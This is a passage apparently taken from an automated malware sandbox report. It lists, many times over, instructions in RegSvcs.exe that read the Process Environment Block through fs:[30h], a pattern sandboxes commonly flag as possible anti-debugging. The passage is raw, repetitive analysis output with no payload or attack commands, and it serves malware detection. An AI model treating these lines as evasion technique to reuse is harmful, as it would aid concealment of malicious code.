                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]10_2_014A2349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]10_2_014A035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]10_2_014A035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]10_2_014A035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A035C mov ecx, dword ptr fs:[00000030h]10_2_014A035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]10_2_014A035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]10_2_014A035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EA352 mov eax, dword ptr fs:[00000030h]10_2_014EA352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C8350 mov ecx, dword ptr fs:[00000030h]10_2_014C8350
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C437C mov eax, dword ptr fs:[00000030h]10_2_014C437C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A30B mov eax, dword ptr fs:[00000030h]10_2_0145A30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A30B mov eax, dword ptr fs:[00000030h]10_2_0145A30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A30B mov eax, dword ptr fs:[00000030h]10_2_0145A30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141C310 mov ecx, dword ptr fs:[00000030h]10_2_0141C310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01440310 mov ecx, dword ptr fs:[00000030h]10_2_01440310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014DC3CD mov eax, dword ptr fs:[00000030h]10_2_014DC3CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]10_2_0142A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]10_2_0142A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]10_2_0142A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]10_2_0142A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]10_2_0142A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]10_2_0142A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014283C0 mov eax, dword ptr fs:[00000030h]10_2_014283C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014283C0 mov eax, dword ptr fs:[00000030h]10_2_014283C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014283C0 mov eax, dword ptr fs:[00000030h]10_2_014283C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014283C0 mov eax, dword ptr fs:[00000030h]10_2_014283C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A63C0 mov eax, dword ptr fs:[00000030h]10_2_014A63C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE3DB mov eax, dword ptr fs:[00000030h]10_2_014CE3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE3DB mov eax, dword ptr fs:[00000030h]10_2_014CE3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE3DB mov ecx, dword ptr fs:[00000030h]10_2_014CE3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CE3DB mov eax, dword ptr fs:[00000030h]10_2_014CE3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C43D4 mov eax, dword ptr fs:[00000030h]10_2_014C43D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C43D4 mov eax, dword ptr fs:[00000030h]10_2_014C43D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]10_2_014303E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]10_2_014303E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]10_2_014303E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]10_2_014303E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]10_2_014303E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]10_2_014303E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]10_2_014303E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]10_2_014303E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143E3F0 mov eax, dword ptr fs:[00000030h]10_2_0143E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143E3F0 mov eax, dword ptr fs:[00000030h]10_2_0143E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143E3F0 mov eax, dword ptr fs:[00000030h]10_2_0143E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014563FF mov eax, dword ptr fs:[00000030h]10_2_014563FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141E388 mov eax, dword ptr fs:[00000030h]10_2_0141E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141E388 mov eax, dword ptr fs:[00000030h]10_2_0141E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141E388 mov eax, dword ptr fs:[00000030h]10_2_0141E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144438F mov eax, dword ptr fs:[00000030h]10_2_0144438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144438F mov eax, dword ptr fs:[00000030h]10_2_0144438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01418397 mov eax, dword ptr fs:[00000030h]10_2_01418397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01418397 mov eax, dword ptr fs:[00000030h]10_2_01418397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01418397 mov eax, dword ptr fs:[00000030h]10_2_01418397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A8243 mov eax, dword ptr fs:[00000030h]10_2_014A8243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A8243 mov ecx, dword ptr fs:[00000030h]10_2_014A8243
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141A250 mov eax, dword ptr fs:[00000030h]10_2_0141A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01426259 mov eax, dword ptr fs:[00000030h]10_2_01426259
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01424260 mov eax, dword ptr fs:[00000030h]10_2_01424260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01424260 mov eax, dword ptr fs:[00000030h]10_2_01424260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01424260 mov eax, dword ptr fs:[00000030h]10_2_01424260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141826B mov eax, dword ptr fs:[00000030h]10_2_0141826B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]10_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141823B mov eax, dword ptr fs:[00000030h]10_2_0141823B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]10_2_0142A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]10_2_0142A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]10_2_0142A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]10_2_0142A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]10_2_0142A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014302E1 mov eax, dword ptr fs:[00000030h]10_2_014302E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014302E1 mov eax, dword ptr fs:[00000030h]10_2_014302E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014302E1 mov eax, dword ptr fs:[00000030h]10_2_014302E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E284 mov eax, dword ptr fs:[00000030h]10_2_0145E284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E284 mov eax, dword ptr fs:[00000030h]10_2_0145E284
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A0283 mov eax, dword ptr fs:[00000030h]10_2_014A0283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A0283 mov eax, dword ptr fs:[00000030h]10_2_014A0283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A0283 mov eax, dword ptr fs:[00000030h]10_2_014A0283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014302A0 mov eax, dword ptr fs:[00000030h]10_2_014302A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014302A0 mov eax, dword ptr fs:[00000030h]10_2_014302A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]10_2_014B62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B62A0 mov ecx, dword ptr fs:[00000030h]10_2_014B62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]10_2_014B62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]10_2_014B62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]10_2_014B62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]10_2_014B62A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428550 mov eax, dword ptr fs:[00000030h]10_2_01428550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428550 mov eax, dword ptr fs:[00000030h]10_2_01428550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145656A mov eax, dword ptr fs:[00000030h]10_2_0145656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145656A mov eax, dword ptr fs:[00000030h]10_2_0145656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145656A mov eax, dword ptr fs:[00000030h]10_2_0145656A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B6500 mov eax, dword ptr fs:[00000030h]10_2_014B6500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]10_2_014F4500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]10_2_014F4500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]10_2_014F4500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]10_2_014F4500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]10_2_014F4500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]10_2_014F4500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]10_2_014F4500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]10_2_01430535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]10_2_01430535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]10_2_01430535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]10_2_01430535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]10_2_01430535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]10_2_01430535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]10_2_0144E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]10_2_0144E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]10_2_0144E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]10_2_0144E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]10_2_0144E53E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E5CF mov eax, dword ptr fs:[00000030h]10_2_0145E5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E5CF mov eax, dword ptr fs:[00000030h]10_2_0145E5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014265D0 mov eax, dword ptr fs:[00000030h]10_2_014265D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A5D0 mov eax, dword ptr fs:[00000030h]10_2_0145A5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A5D0 mov eax, dword ptr fs:[00000030h]10_2_0145A5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014225E0 mov eax, dword ptr fs:[00000030h]10_2_014225E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]10_2_0144E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]10_2_0144E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]10_2_0144E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]10_2_0144E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]10_2_0144E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]10_2_0144E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]10_2_0144E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]10_2_0144E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145C5ED mov eax, dword ptr fs:[00000030h]10_2_0145C5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145C5ED mov eax, dword ptr fs:[00000030h]10_2_0145C5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01422582 mov eax, dword ptr fs:[00000030h]10_2_01422582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01422582 mov ecx, dword ptr fs:[00000030h]10_2_01422582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01454588 mov eax, dword ptr fs:[00000030h]10_2_01454588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E59C mov eax, dword ptr fs:[00000030h]10_2_0145E59C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A05A7 mov eax, dword ptr fs:[00000030h]10_2_014A05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A05A7 mov eax, dword ptr fs:[00000030h]10_2_014A05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A05A7 mov eax, dword ptr fs:[00000030h]10_2_014A05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014445B1 mov eax, dword ptr fs:[00000030h]10_2_014445B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014445B1 mov eax, dword ptr fs:[00000030h]10_2_014445B1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]10_2_0145E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]10_2_0145E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]10_2_0145E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]10_2_0145E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]10_2_0145E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]10_2_0145E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]10_2_0145E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]10_2_0145E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141645D mov eax, dword ptr fs:[00000030h]10_2_0141645D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144245A mov eax, dword ptr fs:[00000030h]10_2_0144245A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AC460 mov ecx, dword ptr fs:[00000030h]10_2_014AC460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144A470 mov eax, dword ptr fs:[00000030h]10_2_0144A470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144A470 mov eax, dword ptr fs:[00000030h]10_2_0144A470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144A470 mov eax, dword ptr fs:[00000030h]10_2_0144A470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01458402 mov eax, dword ptr fs:[00000030h]10_2_01458402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01458402 mov eax, dword ptr fs:[00000030h]10_2_01458402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01458402 mov eax, dword ptr fs:[00000030h]10_2_01458402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141E420 mov eax, dword ptr fs:[00000030h]10_2_0141E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141E420 mov eax, dword ptr fs:[00000030h]10_2_0141E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141E420 mov eax, dword ptr fs:[00000030h]10_2_0141E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141C427 mov eax, dword ptr fs:[00000030h]10_2_0141C427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]10_2_014A6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]10_2_014A6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]10_2_014A6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]10_2_014A6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]10_2_014A6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]10_2_014A6420
